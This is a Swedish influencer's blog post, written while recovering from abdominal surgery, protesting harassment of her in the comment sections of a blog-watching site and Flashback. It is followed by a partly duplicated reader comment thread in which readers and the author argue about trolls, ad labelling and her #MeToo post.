Vem bär ansvaret över Bloggbevakningens kommentarfält? Cam Cam? Pelle? Eller bloggläsaren?

Hej !

Ärligt talat, Klockan är sent. Jag är nyopererad och borde sova!!! 

Kanske borde jag ha bloggstopp när jag är morfin påverkad?! Men jag är irriterad just nu!😡

J*Ävligt irriterad… och ledsen!

– GRRRRRRRR nu kommer jag att spy av mig! Jag tycker det är fördärvligt!!!

IMG_8270

Jag kan inte sova. Värk i ryggen av att ligga som ett ”V” ( Ryggen upp, knöla upp och som ett V.. typ)

Hemlängtan. Lilleman längtan. Jonas längtan!❤️

Många av er som läser bloggen ska själva göra en operation snart. Så jag vill INTE skrämma upp er. Man står ut. Det går över, och som jag skrev tidigare  

-Det är SÅ värt det!☺️🙏🏻

Att jag både har fått tillbaka min funktion i magmusklerna OCH får en fin mage är en investering i min livskvalitet! ✨

Men i kombination med min ”vanliga” ångest som kommer och går har jag just nu väldigt svårt att komma till ro just ikväll/natt. 

Kanske för att mina känslor revs upp i samband med mitt ME TOO ( HÄR ) Kanske för att jag är nervös för min egen mammas reaktion efter  att jag berättade. Jag har lixom velat ”skydda” henne ( och pappa) från den informationen.

Kanske för att jag är lite nervös inför kommande tenta. Kanske för att jag generellt sett har haft ett tufft j*vla år. Jag är rädd för att inte orka hålla ihop allting ibland. Kanske för att jag är rädd för att tillåta mig att vara SVAG för ett ögonblick.

-Kanske en kombination av alltihopa? 

bild-0056

Jag förökar verkligen att göra allting ”rätt”.

När halva Sveriges blogg-kollegor OCH ”VÄNNER” frös ut mig färra året och det började en hatstorm utan dess like så var jag tyst.

Tyst som muren.

Jag tog emot skit, för andras akit! Av respekt mot dom jag verkligen älskat och brytt mig om. Av repsekt mot barn som inte ska behöva få deras föräldrars beteende utmålat i media. 

Men av nån konstig JÄVLA anledning så dras detta upp gång på gång! OM och OM igen! NU IGEN, i samband med min operation och mitt ME TOO inlägg?!  

-HUR HÄNGER DET IHOP?!🤔

Jag backar från ALLT och alla som ger MIG drama. Jag väljer omsorgsfullt vad jag gör. Sollar bland nära och kära.

Fokuserar på det som GER mig energi  inte tvärt om.  Jag satsar helhjärtat på att må bra, kbt, träning och allt som styrker mig själv.

-Jag går MIN väg!

Jag har ALDRIG påstått att jag är perfekt!  Men, vem f*n är det?🤦‍♀️

Jag, precis som alla andra lär mig så länge jag lever. Jag är hungrig på att lära mig och utvecklas… DET ligger i min natur! Jag är entreprenör… det kan ingen ta ifrån mig. 

Jag är tacksam över hur livet vände mig upp och ner förra året. Utan det så hade jag aldrig ”stannat upp”, bett om hjälp och börjat jobba med mig själv.

Min KBT har hjälpt mig att bearbeta saker som hänt,att släppa taget om vissa som jag förlorat och att växa mig igenom den tillfälliga kris som jag hamnade i.

Ångesten kommer och går. Jag har lärt  mig att leva med den. Jag vet att jag är LÅNGT ifrån ensam om att uppleva eller ha upplevt just ångest. Ångest är ingenting att skämmas för! Panikångest är förjävligt… INGEN som inte själv har upplevt det kan förstå!!!

Ärligt talat, vem FAN hade inte fått en ”hack i skivan” efter en konkurs, tre dödsfall, cancerbesked i familjen OCH ett medialt OCH vänskapssvek utan dess like?!

-Hade du mått bra? Skulle inte tro det…….. 

 Att jag är en offentlig person genom bloggen, ska det då vara ett ”godkännande” på att få behandla mig hur som helst?! Jag är medsyster, människa med känslor precis som alla andra! 

-Ska man få stena mig på webben likt en dödsdömd fånge?! Vart och VEM drar gränsen?!

Några exempel:

Jag utbildade mig till Personlig tränare efter flera år som side-kick i träningsbranchen. Jag ville lära mig mer om min kropp och helhetshälsa FÖR att ta den kunskapen med mig resten av mitt liv. BÅDE för att bygga upp mig själv, men även för att kunna inspirera DIG (som vill det) 

 Jag ”skötte mitt”. Hur mycket man än spottade, sparkade och försökte förpesta mig i ”bloggvärlden” så lyckades jag tiga. Tiga som muren…Hur mycket skit jag själv än fick ta.

Rätt eller fel, det var MITT val! 

MEN, det finns speciellt två plattformar där det fullkomligt haglas skit om mig. Just precis just nu. 

Flashback är det ena. Bloggbevakningen är det andra🤢😡

I kommentarsfälten samlas det ett gäng nötter, intrigmakerskor, socialtmissanpassade kärringar!  Människor som lever på att försöka trycka ner andra. Sprida falska rykten, såra, förstöra och jävlas! 

Människor som tala FÖR mig, FÖR min föredetta familj och veta mer om oss än vad vi själva vet. Lägga ord och handlingar i min mun som inte ens är i närheten av hur det ligger till. Fabricerade lögner och falska anklagelser!

 –Till vilken nytta?! 

Att vara en influenser som jag är, det är ett MEDVETET val.

Men ska jag behöva ta HUR mycket skit som helst pga av mitt jobb? Det är ju lika dumt som att säga att kvinnan var för lättklädd, så därför var det ”okay” att vålda henne, hon fick skylla sig själv!  INTE OKAY!!!

Att vara influenser är mitt jobb! Jag älskar mitt jobb, att få peppa, inspirera och få chansen att påverka till positiva saker…..  

MEN…. VAD jag än gör, så ifrågasätts det inne hos Cam Cam (bloggbevakningen) När jag utbildade mig till PT, då var det en lögn… När jag jobbade min första dag på SATS så blev jag anmäld och ifrågasatt efter att blogginlägget ”Ljuger My o sitt nya jobb som PT”

 Dessa inlägg ledde till amnälningar, drama och spekulationer kring mig som gick ut över mina nya kollegor.

-HUR tror du att det kändes? Försök att sätta dig in i MIN situation, när du möter helt nya kollegor (som du aldrig träffat) som berättar att man fått in flera anmälningar mot mig.

-Bra start på nya jobbet, NOT! jag låste in mig på personal-toan och grät…. 

-VARFÖR detta återupprepade nät-mobbning/hat????  

Cam Cam skrev några inlägg och ifrågasatte mitt sätt att REKLAM markera,  för snart ett år sedan. Vilket ledde till anmälningar  ( 9 stycken efter Cam Cam inlägg ) jag blev fälld av RO. Det tar jag på mig, reglerna hade ändrats och jag visste inte hur man skulle formulera sig. Det var jag dock inte ensam om. halva bloggsverige fälldes samtidigt. MEN, jag tar ansvar för mitt. Reglerna gjordes om, jag hängde inte med. PUNKT!  

-Jag gjorde om och rätt! 

Jag fortsatte att ignorera, att föröka med en taktik som att ”lägga locket på” Inte svara, inte läsa, solla bort nät-troll och helt enkelt skita i det.

Jag satte på mig den hårda, stål rustningen där inte något skulle få komma åt mig! 

Vissa dagar har det varit svårare, andra lättare. MEN, när det leder till anmälningar och trakasserier. Då har det gått för långt.

’NU i veckan så bloggade Cam Cam om mitt ME TOO inlägg. Kommentarerna som skrevs där är ju banne mig HELT jävla sjuka!

Man ifrågasätter det jag varit med om, man ifrågasätter det jag berättar?! 

TROTS att helheten kring kampanjen ME TOO är till för att STÖTTA och hjälpa utsatta BARN OCH KVINNOR!❤️✋🏻👊🏻

Istället förpestar man  det som borde vara huvudfokus, med rena och skära lögner kring mig!?!

 När jag nu delade med mig gällande min tidigare operaikon och min nuvarande korrigering hos Dr Tuve. Så gjord jag det för att det finns SÅ många kvinnor/mammor runt om i landet som själva lider av en diastas men inte vet vart man ska vända sig.

Jag ville hjälpa till. jag ville lyfta ett tabu-belagt ämne som ingen vågade prata om eller erkänna…  när jag delade med mig av det våren 2015.

Jag lovade då att vara ärlig och öppen kring detta och lät givetvis mina följare få ta del av korrigeringen, som jag gjorde för tre dagar sedan.  Hos samma doktor, DR Tuve. 

 Nu påstår man inne hos Cam Cam, att jag är sponsrad och att jag borde reklam-markera inläggen. 

-Det är ren bullshit! (precis som mycket annat man försökt sätta dit/anklaga mig för) 

Jag betalade min första operation, jag tog den till och med på delbetalning för att slippa betala allt på en och samma gång. Inte så konstigt när man är ensamstående mamma kan jag tycka. -Eller?  

-MEN, ska jag ens behöva förklara det? Angår min ekonomi dig?

-NEJ!

Jag är väldigt less på att denna återupprepade hat-parad inne hos bloggbevakningen dyker upp VARJE gång jag skriver om något som engagerar. Både viktiga saker men också helt oviktiga saker. VAD jag än skriver så ifrågasätts det!

Varje gång drar man upp sveket/bråket/dramat kring mina föredetta bloggkollegor/vänner. – VARFÖR?

 Enligt Cam Cams läsare så är jag ful, äcklig, mytoman, psykopat, kvinnligt psykopatisk (Vad är skillnanden???) Jag är kleptoman, pyksikt störd, en dålig mamma, En rutten b-kändis, kändiskåt, falsk, Jag har legat med alla mina väninnors män, jag utbildar mig inte till mäklare, och OM jag nu gör det så kommer jag ändå aldrig att lyckas, jag är manipulerande, jag är INTE PT, Jag har aldrig haft diastas, jag har aldrig blivit våldtagen, jag har aldrig varit omhändertagen enligt LVU, jag har aldrig bott tillsammans med Joakim Lundell. Allt jag säger är en lögn. Jag är en dålig mamma, en dålig matte och en värdelös vän. 

Jag har helt enkelt hittat på hela mitt liv…. (????!!!!??? ) 

Ärligt talat så förundras jag över avundsjukan, missunnsamheten, och osäkerheten som ständigt är grunden till dessa hat/nät-mobbningsinlägg!

-VEM bär ansvaret?

-Cam Cam som gladeligen driver ”Bloggbevakningen”. Numera likt en journalist och skriver ”artiklar” om andra bloggare.

(eller på ren och skär svenska, driva fram ett hat och ett följe av trakassering emot mig och MÅNGA andra)

 Eller ska Pelle som är chefen bekom portalen där hon skriver behöva se över hans bloggares kommentesrfält?

-Ska man släppa igenom vad som helst?!  Är det verkligen Okay? 

-Eller är det upp till bloggläsarna själva?  

Uppenbarligen fungerar det inte med ”Frihet under ansvar”  då hatet emot mig (och andra)  totalt spårat ut!  Anmälningar? Förtal? Osanningar? Ryktesspridningar? 

Huvudanledningen till att jag delar med mig kring operationen från första början är för att stötta alla dom kvinnor som söker info kring detta, som själva lider av diastas, som inte vågar, som inte VET att man kan göra någonting åt det.

Jag sökte överallt, men hittade INGENTING innan jag själv bestämde mig. 

jag kommer ihåg att jag var super nervös inför att jag skulle ”erkänna” min operation och vågade blogga om den. Jag rädd för vad man skulle tycka. 

Men istället fick jag tacksamhet av såååååå många andra kvinnor med samma erfarenheter💖🙏🏻

-Det är girl power det! Att stötta, lyfta och hjälpa varandra!

Jag är sjukt glad, nöjd och tacksam mot Dr Tuve på Reform kliniken. Vore jag inte det skulle jag ALDRIG dela med mig av det!

Om jag kan hjälpa andra kvinnor att få samma möjlighet som jag att få tillbaka magmusklernas funktion i både vardag och träning, OCH få en fin mage, då delar jag gladeligen med mig av dessa tips!

-HELT gratis! 💖

IMG_8215

Samma sak gällande Me Too kampanjen.

Jag vill hjälpa dom kvinnor att våga kliva fram som aldrig vågat prata med någon. jag bar själv på detta i många, många år innan jag tillslut berättade.

Jag har haft en brokig bakgrund och har ärr som du aldrig kommer att kunna se. 

Men jag har hittat styrkan i mig själv, med hjälp av människor omkring mig. Jag har försökt vända allt det negativa till erfarenheter som tar mig framåt. I hela min tonår, och min unga vuxenliv jobbade jag dygnet runt, 7 dagar i veckan…

Jag påstod att jag drev upp mitt företag. Det var iof sant. Men sanningen var att jag flydde från allt jag varit me dom. Att bli en arbetsnarkoman höll min ångest i schakt.

Jag flydde från allt som gjorde ont…..

475A0129

#Me Too, rev upp allting igen. Kommentarerna inne hos Cam cam sårade!😰💔

Dom gick RAKT in i benmärgen!

Så grattis till dig, ditt bittra, elaka lilla nättroll… du gjorde mig faktisk ledsen. Du träffade mig rakt in i hjärtat vid tidpunkt där jag var sårbar och ”öppen” i samband med aktuellt ämne kring mitt förflutna…… 

-Fy Fan för alla vidriga troll som gömmer sig bakom sina skärmar/plattor med sina ”anonyma” konton!

Jag hade INTE drivit bloggen på samma sätt som Camilla ”Cam Cam  Bloggbevakningen gör! Oavsett klick, trafik och publicitet… 

 / My Martens  

178 Komentarer

 1. Cam Cam måste vara en mycket elak person innerst inne. Hon tjänar pengar också på sin elakhet. Hon letar runt bland bloggarna för att hitta något hon kan slå ner på. Tanterna i kommentarsfältet är nog dina gamla avundsjuka f.d. bloggvänner som vräker ur sig. Bittra elaka kärringar som är avundsjuka för att du klarar dig mycket bättre utan dom. Du blir också bara vackrare med åren och du är företagsam, arbetsam och klarar både det ena och det andra. Strunta i packet mamma My. Kram ?

 2. Blir fasen mörkrädd när jag läser kommentarerna & hur dom hetsar varandra till att skriva ännu elakare saker. Min 7 åring är mer mogen än vad alla dom är!
  Mobbingbevakning borde läggas ner!

 3. Hej fina My ! Följer din blogg o tycker du verkar vara en grym tjej ! Ta inte åt dig ! Men är det något du inte kan outa ang din förra vänskap? Må så gott fina My ) längtar efter din bok ??

 4. Jag har läst där. Vidrigt. Och ändå påstår cam cam att hon inte tillåter jag under det inlägget. Sure.
  Förstår att du blir ledsen
  Men försök vänd på det. Du får trafik till din blogg via henne. Jag till exempel hade aldrig hittat din blogg om det inte varit för Bloggbevakning. Nu läser jag hos dig varje dag. Bara en sån sak!
  Kram❤️

 5. Ja du My… Det finns en anledning till att jag tycker om djur mer än människor!
  Vi människor gräver vår egna grav tror jag. Bara elakheter och falskspel. Vart är vi på väg….

 6. Hej! Intressant läsning. Din blogg är ditt arbete. Du har ett ansvar att göra den bra för att behålla jobbet eller hur? Har varit in på din Instagram och sett flertalet felmärkt samarbeten fast du skriver att du gjort om och gjort rätt? Sen skriver du följande om de som följer bloggportalen ”I kommentarsfälten samlas det ett gäng nötter, intrigmakerskor, socialtmissanpassade kärringar! ” det är alltså mig du beskriver? Hur kan du då mena att du är en bättre person än oss? Och till sist hur orkar du kolla andras bloggar och dess kommentarer om dig? Och till sist är det värt det?

  • Läs igenom kommentarerna kring mig…… Är du en av dom som skriver så, jag då är det dig jag syftar på. ALLA mina reklamsamarbeten är markerade. ALLA! Där det inte finns någon markering finns inget aktuellt samarbete. Jag har blivit granskad vid flertal tillfällen, både av RO och skatteverket. För ett år sedan ändrades reglerna, jag hängde inte med och blev fälld av RO (Inte skatteverket) Sedan dess finns det inte ETT enda felmarkerat inlägg… Så gällande dina påståenden kring mina smarbeten så har du FEL, MED stora bokstäver. Sen huruvida du väljer att kommunicera det kan bara du och ditt samvete svara för… jag däremot är j*vligt less på att få ta emot oförtjänt skit. Det ska ingen behöva göra… / My Martens

   • Ok så exempelvis inläggen på instagram d.22/9 och 25/9 är ok då du enbart skrivit ” #samarbete” ? I min värld och som jag fått lära mig är det inte alls tillräckligt för att berätta för läsaren att det är reklam.

    • Beror lite på vilket/vilka i lägg du syftar på. Vissa är köpt reklam, andra är markerade samarbeten…. Och jag hävdar fortfarande att jag markerar mina samarbeten utefter vad dom är. Jag har ingenting att dölja, jag är både glad och stolt över mina samarbeten? Det är ju det jag lever på. Så varför skulle jag INTE markera dessa?! Jag precis som mina kunder/samarbetspartner som väljer att marknadsföra sig med mig som profil och genom mina kanaler vill verkligen förmedla just det! ???
     Det var skillnad innan, när det inte fanns regler att förhålla sig till. Innan någon egentligen hade koll på hur vi skulle börja marknadsföra på våra socialmedier. Men nu gör det det….
     man kan markera på måååånga olika sätt. Jag får ständiga uppdateringar och gör mitt bästa för att hänga med.
     Men om vi nu leker med tanken att jag skulle missa det vid ett tillfälle.
     Tycker du att det är Okay och att det rättfärdigar den övriga vuxenmobbning jag får utstå?
     att jag får ta emot övrig skit som kommer ifrån detta otroligt smutsiga, kommentarsfält. Att jag är mytoman,en slampa,en psykopat, en dålig mamma, äcklig, ful, att jag hittat på i stort sett hela mitt liv. Att jag är misslyckad, sjuk och opålitlig.
     Jag har t.o.m blivit anmäld till soc genom denna fantastiska blogg. Även till SATS och till RO.
     Är det rätt? Känner du att du vill stå för den typ av oförtjänt ifrågasättande på ALLA plan…… känner du dig stolt över att vara en av dom som jag syftar på? Eller har det kanske gått lite för långt?
     En stilla undran från min sida…

     • Nej det tycker jag är rent förjäkligt om nån skriver så om dig! Jag skulle aldrig kommentera ditt yttre eller ditt föräldraskap för det kan jag omöjligt veta något om eftersom jag inte känner dig. Sånt ska givetvis inte få förekomma för de är sjukt elakt! Det jag kommenterar är ditt sätt att markera reklam och det är nått helt annat!

     • Men om du då istället läser HELA mitt i lägg, och ALLA kommentarer inne på denna ofiltrerad blogg, så kanske du börjar se annorlunda på saken….

    • Har du verkligen inget bättre för dig än att desperat leta ”fel” hos alla andra? Detta är ju så sjukt!
     Har du aldrig någonsin gjort fel, sagt fel, sagt saker utan att tänka efter? Denna häxjakt är inte sund för någon

 7. Usch och fy!! Lider verkligen med dig. Det känns som att du får ta allt ? Känner du aldrig att du vill berätta din sida, din syn på allt som hänt gällande dina fd, sk vänner? Eller skulle det bara förvärra situationen ännu mer?
  Vi är så otroligt många som tycker om dig. Du är en förebild i mångt och mycket. Tycker synd om dom som är på dig. Dom håller förmodligen att ätas upp på insidan av både svartsjuka och avundssjuka. Annars skulle dom aldrig göra som dom gör…
  Hoppas att du får några timmars sömn nu ⭐️ Kram fina ❤️

   • Ja, varför inte berätta. Känns lite underligt att du som är så snäll, ärlig mm skulle få så oförtjänt mycket slit..
    Du berättar BARA om dina operationer för att stötta andra… Eller?
    Du flyttat tillbaka till Ölannd för sonen är det viktigaste. Du gör allt för honom. Men hur mycket är du där?
    Du kanske blir ifrågasatt pga att du vinklar för mycket för egen vinning och det lyser igenom så väl?!

    • Och du är en av dom som ännu en gång ifrågasätter mig som mamma.
     Jag är där nere varannan vecka. Nu var han längre hos mig innan denna period för att hans pappa var utomlands utan barn på sin vecka och sedan tvärt om. Så vi bytte, pusslade och såg till att barnen fick en semester tillsammans.
     Är detta fel? Hur känner du att min pendling där jag har dubbla bostäder, dubbla kostnader och extremt mycket tid i pendling skulle kunna vara av någonting annat än REN kärlek till Lilleman?
     Nejdu….. min pendling för Lillemans skull, eller min operation av min diastas efter min graviditet med just Lilleman har KNAPPAST med denna häxjakt och vuxenmobbning att göra… dessa två faktorer rättfärdigar inte detta smutsiga beteende!
     Tycker du att det som skriva är rätt? Är det ett normalt sunt beteende? Är du en av dom som skriver? Är du en del i häxjakten?
     Skulle du må bra av att kalla någon du inte känner eller har träffat, för äcklig, ful, psyksjuka, dålig mamma, mytoman och gud vet allt..
     Tycker du att gemensam vuxenmbbbing mot en offentlig person ska få äga rum på detta sätt? Anmälningar, hot? Trakasserier genom ett kommentarsfält?
     Oavsett om det är mot mig eller någon annan så tycker inte jag att det är Okay!
     Långt därifrån……
     det gör mig uppriktigt sagt ledsen, både som utsatt…
     men också att det är 2017 och det fortfarande finns ett klientel av människor som utsätter andra för just näthat/mobbning/trakasserier. Sorgligt! ?

     • Nej, Ny. Jag är inte en del av denna häxjakt och jag anser inte att det är ok att kommentera ngn annans utseende mm eller kalla andra människor för hemskheter. Det är inte det jag menar, men får heller enkelt inte ihop det med vad du skriver och sen hur du gör. Ditt liv och dina beslut! Mitt liv och mina beslut.
      Må väl ?!

 8. Låt inte dom ta din energi, men förstår om du blir ledsen ❤️
  Fattar inte vad hon triggas igång på hos dig, men det säger mer om henne. Kanske är det att du är driven, stark o går din väg. Antagligen egenskaper som hon själv saknar…
  Försök nu att vila dig o hämta krafter ❤️

 9. Cam Cam måste vara en mycket elak person innerst inne. Hon tjänar pengar också på sin elakhet. Hon letar runt bland bloggarna för att hitta något hon kan slå ner på. Tanterna i kommentarsfältet är nog dina gamla avundsjuka f.d. bloggvänner som vräker ur sig. Bittra elaka kärringar som är avundsjuka för att du klarar dig mycket bättre utan dom. Du blir också bara vackrare med åren och du är företagsam, arbetsam och klarar både det ena och det andra. Strunta i packet mamma My. Kram 💗

 10. Håller med dej. Men gå inte in där och läs eller kommentera. Vem skulle må bra av det. Du blir bara ledsen och det inte värt det. Går ej att ändra på andra. Så lev ditt liv och ha det fint. Kram.

 11. Blir fasen mörkrädd när jag läser kommentarerna & hur dom hetsar varandra till att skriva ännu elakare saker. Min 7 åring är mer mogen än vad alla dom är!
  Mobbingbevakning borde läggas ner!

 12. Hej fina My ! Följer din blogg o tycker du verkar vara en grym tjej ! Ta inte åt dig ! Men är det något du inte kan outa ang din förra vänskap? Må så gott fina My ) längtar efter din bok 🌸🌸

 13. Jag har läst där. Vidrigt. Och ändå påstår cam cam att hon inte tillåter jag under det inlägget. Sure.
  Förstår att du blir ledsen
  Men försök vänd på det. Du får trafik till din blogg via henne. Jag till exempel hade aldrig hittat din blogg om det inte varit för Bloggbevakning. Nu läser jag hos dig varje dag. Bara en sån sak!
  Kram❤️

 14. Ja du My… Det finns en anledning till att jag tycker om djur mer än människor!
  Vi människor gräver vår egna grav tror jag. Bara elakheter och falskspel. Vart är vi på väg….

 15. Hej! Intressant läsning. Din blogg är ditt arbete. Du har ett ansvar att göra den bra för att behålla jobbet eller hur? Har varit in på din Instagram och sett flertalet felmärkt samarbeten fast du skriver att du gjort om och gjort rätt? Sen skriver du följande om de som följer bloggportalen ”I kommentarsfälten samlas det ett gäng nötter, intrigmakerskor, socialtmissanpassade kärringar! ” det är alltså mig du beskriver? Hur kan du då mena att du är en bättre person än oss? Och till sist hur orkar du kolla andras bloggar och dess kommentarer om dig? Och till sist är det värt det?

  • Läs igenom kommentarerna kring mig…… Är du en av dom som skriver så, jag då är det dig jag syftar på. ALLA mina reklamsamarbeten är markerade. ALLA! Där det inte finns någon markering finns inget aktuellt samarbete. Jag har blivit granskad vid flertal tillfällen, både av RO och skatteverket. För ett år sedan ändrades reglerna, jag hängde inte med och blev fälld av RO (Inte skatteverket) Sedan dess finns det inte ETT enda felmarkerat inlägg… Så gällande dina påståenden kring mina smarbeten så har du FEL, MED stora bokstäver. Sen huruvida du väljer att kommunicera det kan bara du och ditt samvete svara för… jag däremot är j*vligt less på att få ta emot oförtjänt skit. Det ska ingen behöva göra… / My Martens

   • Ok så exempelvis inläggen på instagram d.22/9 och 25/9 är ok då du enbart skrivit ” #samarbete” ? I min värld och som jag fått lära mig är det inte alls tillräckligt för att berätta för läsaren att det är reklam.

    • Beror lite på vilket/vilka i lägg du syftar på. Vissa är köpt reklam, andra är markerade samarbeten…. Och jag hävdar fortfarande att jag markerar mina samarbeten utefter vad dom är. Jag har ingenting att dölja, jag är både glad och stolt över mina samarbeten? Det är ju det jag lever på. Så varför skulle jag INTE markera dessa?! Jag precis som mina kunder/samarbetspartner som väljer att marknadsföra sig med mig som profil och genom mina kanaler vill verkligen förmedla just det! 😂🙈😃

     Det var skillnad innan, när det inte fanns regler att förhålla sig till. Innan någon egentligen hade koll på hur vi skulle börja marknadsföra på våra socialmedier. Men nu gör det det….

     man kan markera på måååånga olika sätt. Jag får ständiga uppdateringar och gör mitt bästa för att hänga med.

     Men om vi nu leker med tanken att jag skulle missa det vid ett tillfälle.

     Tycker du att det är Okay och att det rättfärdigar den övriga vuxenmobbning jag får utstå?
     att jag får ta emot övrig skit som kommer ifrån detta otroligt smutsiga, kommentarsfält. Att jag är mytoman,en slampa,en psykopat, en dålig mamma, äcklig, ful, att jag hittat på i stort sett hela mitt liv. Att jag är misslyckad, sjuk och opålitlig.

     Jag har t.o.m blivit anmäld till soc genom denna fantastiska blogg. Även till SATS och till RO.

     Är det rätt? Känner du att du vill stå för den typ av oförtjänt ifrågasättande på ALLA plan…… känner du dig stolt över att vara en av dom som jag syftar på? Eller har det kanske gått lite för långt?

     En stilla undran från min sida…

     • Nej det tycker jag är rent förjäkligt om nån skriver så om dig! Jag skulle aldrig kommentera ditt yttre eller ditt föräldraskap för det kan jag omöjligt veta något om eftersom jag inte känner dig. Sånt ska givetvis inte få förekomma för de är sjukt elakt! Det jag kommenterar är ditt sätt att markera reklam och det är nått helt annat!

     • Men om du då istället läser HELA mitt i lägg, och ALLA kommentarer inne på denna ofiltrerad blogg, så kanske du börjar se annorlunda på saken….

    • Har du verkligen inget bättre för dig än att desperat leta ”fel” hos alla andra? Detta är ju så sjukt!

     Har du aldrig någonsin gjort fel, sagt fel, sagt saker utan att tänka efter? Denna häxjakt är inte sund för någon

 16. Usch och fy!! Lider verkligen med dig. Det känns som att du får ta allt 😰 Känner du aldrig att du vill berätta din sida, din syn på allt som hänt gällande dina fd, sk vänner? Eller skulle det bara förvärra situationen ännu mer?
  Vi är så otroligt många som tycker om dig. Du är en förebild i mångt och mycket. Tycker synd om dom som är på dig. Dom håller förmodligen att ätas upp på insidan av både svartsjuka och avundssjuka. Annars skulle dom aldrig göra som dom gör…
  Hoppas att du får några timmars sömn nu ⭐️ Kram fina ❤️

   • Ja, varför inte berätta. Känns lite underligt att du som är så snäll, ärlig mm skulle få så oförtjänt mycket slit..
    Du berättar BARA om dina operationer för att stötta andra… Eller?

    Du flyttat tillbaka till Ölannd för sonen är det viktigaste. Du gör allt för honom. Men hur mycket är du där?

    Du kanske blir ifrågasatt pga att du vinklar för mycket för egen vinning och det lyser igenom så väl?!

    • Och du är en av dom som ännu en gång ifrågasätter mig som mamma.

     Jag är där nere varannan vecka. Nu var han längre hos mig innan denna period för att hans pappa var utomlands utan barn på sin vecka och sedan tvärt om. Så vi bytte, pusslade och såg till att barnen fick en semester tillsammans.

     Är detta fel? Hur känner du att min pendling där jag har dubbla bostäder, dubbla kostnader och extremt mycket tid i pendling skulle kunna vara av någonting annat än REN kärlek till Lilleman?

     Nejdu….. min pendling för Lillemans skull, eller min operation av min diastas efter min graviditet med just Lilleman har KNAPPAST med denna häxjakt och vuxenmobbning att göra… dessa två faktorer rättfärdigar inte detta smutsiga beteende!

     Tycker du att det som skriva är rätt? Är det ett normalt sunt beteende? Är du en av dom som skriver? Är du en del i häxjakten?

     Skulle du må bra av att kalla någon du inte känner eller har träffat, för äcklig, ful, psyksjuka, dålig mamma, mytoman och gud vet allt..

     Tycker du att gemensam vuxenmbbbing mot en offentlig person ska få äga rum på detta sätt? Anmälningar, hot? Trakasserier genom ett kommentarsfält?

     Oavsett om det är mot mig eller någon annan så tycker inte jag att det är Okay!
     Långt därifrån……

     det gör mig uppriktigt sagt ledsen, både som utsatt…
     men också att det är 2017 och det fortfarande finns ett klientel av människor som utsätter andra för just näthat/mobbning/trakasserier. Sorgligt! 💔

     • Nej, Ny. Jag är inte en del av denna häxjakt och jag anser inte att det är ok att kommentera ngn annans utseende mm eller kalla andra människor för hemskheter. Det är inte det jag menar, men får heller enkelt inte ihop det med vad du skriver och sen hur du gör. Ditt liv och dina beslut! Mitt liv och mina beslut.

      Må väl 💜!

 17. Du är ju inne och provocerar dem. Varför skriva att det inte är reklam för att sen reklam märka inlägget? Gå inte in på sånna sidor och skriv inte på bloggbevakning, du gör bort dig och matar trollen. Jag gillar varken dig eller henne speciellt mycket, men det är ju vida känt att mobbare tycker det är kul med reaktioner så strunta i att skriva där inne

  • Men någon gång så rinner ju bägaren över. Även för mig. X-antal anälmningar för långa. X-antal påståenden kring mig som mamma, som person, huruvida jag är ful, äcklig, mytoman, kleptoman och gud vet allt… när ska det få ett stop? Det är 2017 och häxjakten är i full gång….

   • Fast du får ju inte låta den göra det. När du dementerar att du gör reklam för att sen markera inlägget med reklam så matar du ju dem. Du bevisar att de har rätt. Du lägger dig. Håll huvudet högt och strunta i det, gå inte ens in där. Då kommer du komma mycket mycket längre. Får du kritik här så bemöt den om du vill, men strunta i andra sidor. Det är inte dina läsare, du behöver inte bry dig om dem.

 18. Men snälla snälla My! Lägg ner denna energi som du skriver om på något helt annat, på din rehabilitering istället. Du borde vila upp dig, stressa ner, komma till ro efter en sådan här operation, men så sitter du och skriver ett jätte jättelångt argt negativt inlägg. Du kan aldrig någonsin få trollen o tanterna att sluta. Visa istället att du står i högre kurs än vad de gör. Börja göra som proffsbloggarna gör, Carolina Gynning, Katrin Zytomierska, för att inte tala om Charlotte Perelli, de skulle aldrig aldrig någonsin kommentera en hatkommentar, finns inte på kartan, och därför tycker trollen inte att det är roligt att skriva så mycket skit på deras bloggar för de får absolut inget gehör
  Om du ska hålla på och bemöta, förklara, gå i försvarsställning m.m ja då matar du bara trollen och tanterna med ännu mer energi..
  Låt dig inte gå i denna fällan, utan skit i att bemöta skit överhuudtaget, håll dig för god för det och då får du också större status överallt.
  Titta på Perelli, hon bemöts som en äkta diva och det är hon ju också, hon har skyhög status överallt, för hon kommenterar aldrig något negativt på sin blogg o hon skriver heller aldrig något negativt heller. Gör som stjärnorna och inte som trollen och tanterna. Lycka till med rehabiliteringen.

   • Jag ångrar verkligen att jag läste dedär vidriga kommentarerna, hade högre tankar om folk. Vad har dessa människor varit med om eftersom de har en har ett sådant story behov av att vara så elaka? Ledsen för din skull My, du förtjänar inte att bli behandlad på det sättet ? Tror egentligen att det är några få som skriver och att de skriver många kommentarer, egentligen säger de så mycket mer om dem än om dig. Vi är så många fler som inspireras utav dig på så många olika plan!
    Att kvinnor ifrågasätter andra kvinnor angående #metoo inlägg påverkar hela syftet med det. Jag har exempelvis inte gått ut och berättat om det som hände mig för 10 år sedan och påverkat mitt liv så mycket, för jag är rädd över att inte bli betrodd. Att folk gör narr av mina upplevelser, som satt så djupa spår i mig (och för att jag precis som du är orolig över hur mamma skulle ta det).
    Män som står bakom sexuella trakasserier av olika grad, är också de som vinner på att vi kvinnor inte står enade i detta. Syftet med #metoo var ju att vi tillsammans kan göra skillnad och att vi stödjer och tror på varandra.
    Ta hand om dig fina My ?

  • Jag håller med! Två fel blir aldrig ett rätt – det blir bara pajigt och barnsligt att svara upp med kilometerlånga texter.
   Om du vill att din blogg ska vara en feelgood-blogg måste du ställa dig över alla som försöker missförstå eller leta fel på dig – annars blir din blogg bara en sandlåda med dålig energi. Sorry – men då känner jag vissa ggr jag går in och läser; ånej, vad är det nu hon är upprörd över eller hur har hon blivit missförstådd idag? Vi vanliga läsare behöver inte drama flera ggr i veckan utan mår bäst utan den!

   • Håller verkligen med dig den där trevliga känslan som jag tror och hoppas My vill ha härinne försvinner mer och mer av alla dessa långa arga inlägg som de flesta av oss läsare nog vill vara utan sköt det privat i sådana fall eller strunta i de. Kanske dags att ta en paus My istället för ha allt detta hängade över dig varje dag få ny energi och starta på nytt när du är klar med din utbildning och det kanske har lugnat ner sig. Hoppas också du kan komma till ro på Öland de veckor du är där känns mest som ett ont måste när jag läser dina inlägg därifrån.

 19. Låt inte dom ta din energi, men förstår om du blir ledsen ❤️
  Fattar inte vad hon triggas igång på hos dig, men det säger mer om henne. Kanske är det att du är driven, stark o går din väg. Antagligen egenskaper som hon själv saknar…
  Försök nu att vila dig o hämta krafter ❤️

